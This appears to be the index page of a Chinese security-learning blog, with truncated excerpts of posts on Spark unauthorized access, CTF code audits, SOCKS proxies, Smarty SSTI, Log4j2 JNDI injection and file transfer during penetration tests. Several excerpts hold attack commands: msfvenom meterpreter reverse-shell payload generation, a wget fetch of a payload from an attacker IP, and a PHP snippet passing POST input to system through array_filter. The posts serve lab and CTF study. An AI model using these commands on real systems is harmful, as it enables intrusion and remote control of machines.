Spark未授权访问 介绍apache顶级项目,大规模数据处理计算引擎。为了方便的给使用者控制系统进行计算和查看任务结果,提供了WebUI图形化界面和相应的REST API方便用户操作。支持用户向管理节点提交应用,并分发给集群使用,如果管理节点未启用ACL(访问控制),我们便可在集群中执行任意代码。 环境搭建进入vulhub-master/spark/unacc 使用 1docker-compos 2024-01-25 #漏洞复现
代码审计 [GDOUCTF 2023]受不了一点0x00 这个就是代码审计 123456789101112131415161718192021222324252627282930313233343536373839404142434445<?phperror_reporting(0);header("Content-type:text/html;charset=utf-8");if 2024-01-25 #CTF刷题记录
Socks代理 socks简介 SOCKS是一种网络传输协议,主要用于客户端与外网服务器之间通讯的中间传递。 根据OSI模型,SOCKS是会话层的协议,位于表示层与传输层之间。 使用TCP协议传输数据,因而不提供如传递 ICMP 信息之类的网络层网关服务 由于socks是会话层的代理,不提供ICMP的代理,所以ping 是代理不了的 socks代理 被代理端与代理服务器通过 SOCKS4/5 2024-01-25 #渗透
total [NISACTF 2022]level-up0x00 记录一下我第一次遇到的较为综合的题目 使用的知识点 扫描目录 md5 碰撞 sha1加密 0x01 这个地方其实其实什么东西也没有有,但是我们需要利用这一关到达下面的关卡 找到第二关 0x02 12345678910111213141516171819202122<?php//here is level 2error_report 2024-01-23 #CTF刷题记录
linux文件传输 生成payload首先我们得生成一个linux下的可执行文件.elf 1msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.79.138 lport=9999 -f elf -o linux_64_9999.elf wget下载指定的文件 12wget http://192.168.81.229/5555.elf -P /t 2024-01-22 #渗透
windows文件传输 BitsadminBITSAdmin 是一个命令行工具,可以使用它创建下载或上传作业,并监视其进度。 缺点不能下载python 开启的http服务,必须是真实的http 服务 现在尝试使用 生成payload1msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.81.238 lport=6666 -f hta-psh &g 2024-01-22 #渗透
php_exec array_filter12345678910<?php $cmd=$_POST['cmd'];$array1=array($cmd);$func =$_GET['func'];array_filter($array1,$func);//用回调函数过滤数组中的元素:array_filter(数组,函数)//?func=system//cmd=whoam 2024-01-22 #靶场记录
smart ssti [CISCN 2019华东南]Web110x00 关键点 xff + Smarty 0x01 根据提示使用 发现执行了, 0x02 代码执行system() 发现并没有存在 看源码 2024-01-21 #CTF刷题记录
Log4j2 简介Apache log4j 是Apache 的一个开源项目, Apache log4j2 是一个Java 的日志记录工具。该工具重写了log4j 框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 漏洞简介log4j2 中存在JNDI 注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 2024-01-20 #渗透